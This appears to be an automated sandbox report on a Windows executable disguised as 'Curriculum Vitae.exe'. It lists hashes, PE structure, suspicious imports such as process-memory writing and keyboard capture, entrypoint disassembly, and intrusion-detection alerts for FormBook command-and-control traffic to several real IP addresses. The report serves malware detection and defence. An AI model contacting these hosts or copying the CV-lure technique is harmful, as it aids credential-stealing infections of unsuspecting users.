                    Preview:t....0ZTB...[...o.63..eAN...9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH.BSP8/.ZB.K.s.Iu.r.^Y)t2?-! #%.!2>X_.t (b4',hP,s.ycz9-)'h_OB.BSP60ZT;LK.o"/..37..:3.W..x(^.I...f4%.X...tY%.._S2i"*.FRBH9BSPfuZT.LCFO7.`BSP60ZTB.BDSII2BS.20ZTBMBFRB.-BSP&0ZT"IBFR.H9RSP62ZTDMBFRBH9DSP60ZTBM"BRBJ9BSP60XT..BFBBH)BSP6 ZTRMBFRBH)BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBF|6-A6SP6..PBMRFRB.=BS@60ZTBMBFRBH9BSp60:TBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBM

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.153608100898532
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Curriculum Vitae.exe
                    File size:1'268'224 bytes
                    MD5:eda3b2c20013e6a58d10ad852d39fd29
                    SHA1:56ff3fdfee53f3e37c14cf10bc3d4044535a9da0
                    SHA256:291ca7bba147041963c8d17b3504981dd2eb595945e7472d5e3e62d78f0fd6a7
                    SHA512:bf0b484012b7f06628cde2aef373c5f66e7fa2664e827004b58cd5a20962a92c9f29ccc3fb55bdd6e38e57a580a6e2cf0ce987f7c85e31b3555d9f1cc805dd2e
                    SSDEEP:24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aWMLl2qsbgz2NL/HHE:7TvC/MTQYxsWR7aWjMz2x/H
                    TLSH:4245C00273D1C022FFAB92734F5AF6515ABC69260123E62F13981D79BE701B1563E7A3
                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                    File Icon

                    Icon Hash:aaf3e3e3938382a0

                    Static PE Info

                    General

                    Entrypoint:0x420577
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66CC5F49 [Mon Aug 26 10:56:09 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:948cc502fe9226992dce9417f952fce3

                    Entrypoint Preview

                    Instruction
                    call 00007F81D8C1AB83h
                    jmp 00007F81D8C1A48Fh
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007F81D8C1A66Dh
                    mov dword ptr [esi], 0049FDF0h
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 0049FDF8h
                    mov dword ptr [ecx], 0049FDF0h
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007F81D8C1A63Ah
                    mov dword ptr [esi], 0049FE0Ch
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 0049FE14h
                    mov dword ptr [ecx], 0049FE0Ch
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    mov esi, ecx
                    lea eax, dword ptr [esi+04h]
                    mov dword ptr [esi], 0049FDD0h
                    and dword ptr [eax], 00000000h
                    and dword ptr [eax+04h], 00000000h
                    push eax
                    mov eax, dword ptr [ebp+08h]
                    add eax, 04h
                    push eax
                    call 00007F81D8C1D22Dh
                    pop ecx
                    pop ecx
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    lea eax, dword ptr [ecx+04h]
                    mov dword ptr [ecx], 0049FDD0h
                    push eax
                    call 00007F81D8C1D278h
                    pop ecx
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    mov esi, ecx
                    lea eax, dword ptr [esi+04h]
                    mov dword ptr [esi], 0049FDD0h
                    push eax
                    call 00007F81D8C1D261h
                    test byte ptr [ebp+08h], 00000001h
                    pop ecx

                    Rich Headers

                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5ee28.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1330000x7594.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xd40000x5ee280x5f00087b20c531307b935aa0ab165037d4582False0.9302425986842106data7.900373560845221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x1330000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                    RT_RCDATA0xdc7b80x560bedata1.0003291284338593
                    RT_GROUP_ICON0x1328780x76dataEnglishGreat Britain0.6610169491525424
                    RT_GROUP_ICON0x1328f00x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0x1329040x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0x1329180x14dataEnglishGreat Britain1.25
                    RT_VERSION0x13292c0x10cdataEnglishGreat Britain0.5970149253731343
                    RT_MANIFEST0x132a380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                    Imports

                    DLLImport
                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                    2024-08-29T12:15:39.466977+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215508480192.168.2.5188.114.96.3
                    2024-08-29T12:16:13.543047+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315509180192.168.2.584.32.84.32
                    2024-08-29T12:16:22.860493+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315509380192.168.2.566.81.203.200
                    2024-08-29T12:14:18.641798+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315509580192.168.2.566.81.203.200
                    2024-08-29T12:15:57.839714+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315508680192.168.2.5195.110.124.133
                    2024-08-29T12:16:00.487795+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315508780192.168.2.5195.110.124.133
                    2024-08-29T12:15:55.290457+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315508580192.168.2.5195.110.124.133
                    2024-08-29T12:16:08.467911+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315508980192.168.2.584.32.84.32
                    2024-08-29T12:16:11.027129+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315509080192.168.2.584.32.84.32
                    2024-08-29T12:16:16.092689+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215509280192.168.2.584.32.84.32
                    2024-08-29T12:16:25.407496+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315509480192.168.2.566.81.203.200
                    2024-08-29T12:16:02.916430+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215508880192.168.2.5195.110.124.133

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Aug 29, 2024 12:15:38.454984903 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:38.459816933 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:38.459935904 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:38.468339920 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:38.473429918 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.466732025 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.466891050 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.466902971 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.466976881 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:39.467830896 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.467844009 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.467999935 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:39.468730927 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.468744993 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.468810081 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:39.469280005 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:39.469342947 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:39.474247932 CEST5508480192.168.2.5188.114.96.3
                    Aug 29, 2024 12:15:39.479047060 CEST8055084188.114.96.3192.168.2.5
                    Aug 29, 2024 12:15:54.607157946 CEST5508580192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:54.612019062 CEST8055085195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:54.612114906 CEST5508580192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:54.623213053 CEST5508580192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:54.628010988 CEST8055085195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:55.290220022 CEST8055085195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:55.290385008 CEST8055085195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:55.290457010 CEST5508580192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:56.126255989 CEST5508580192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:57.147192955 CEST5508680192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:57.159696102 CEST8055086195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:57.159790039 CEST5508680192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:57.171835899 CEST5508680192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:57.176717043 CEST8055086195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:57.838479042 CEST8055086195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:57.839629889 CEST8055086195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:57.839714050 CEST5508680192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:58.673082113 CEST5508680192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:59.692096949 CEST5508780192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:59.700634003 CEST8055087195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:59.700752974 CEST5508780192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:59.711415052 CEST5508780192.168.2.5195.110.124.133
                    Aug 29, 2024 12:15:59.716521978 CEST8055087195.110.124.133192.168.2.5
                    Aug 29, 2024 12:15:59.717113972 CEST8055087195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:00.487427950 CEST8055087195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:00.487692118 CEST8055087195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:00.487795115 CEST5508780192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:01.219878912 CEST5508780192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.242301941 CEST5508880192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.247334003 CEST8055088195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:02.247545004 CEST5508880192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.255439997 CEST5508880192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.260406017 CEST8055088195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:02.915963888 CEST8055088195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:02.916371107 CEST8055088195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:02.916429996 CEST5508880192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.918904066 CEST5508880192.168.2.5195.110.124.133
                    Aug 29, 2024 12:16:02.923830032 CEST8055088195.110.124.133192.168.2.5
                    Aug 29, 2024 12:16:07.986629963 CEST5508980192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:07.991471052 CEST805508984.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:07.991614103 CEST5508980192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:08.003076077 CEST5508980192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:08.008053064 CEST805508984.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:08.467814922 CEST805508984.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:08.467911005 CEST5508980192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:09.516776085 CEST5508980192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:09.523742914 CEST805508984.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:10.535487890 CEST5509080192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:10.545139074 CEST805509084.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:10.545234919 CEST5509080192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:10.557533026 CEST5509080192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:10.562668085 CEST805509084.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:11.026969910 CEST805509084.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:11.027128935 CEST5509080192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:12.063739061 CEST5509080192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:12.068711042 CEST805509084.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:13.082667112 CEST5509180192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:13.087553978 CEST805509184.32.84.32192.168.2.5
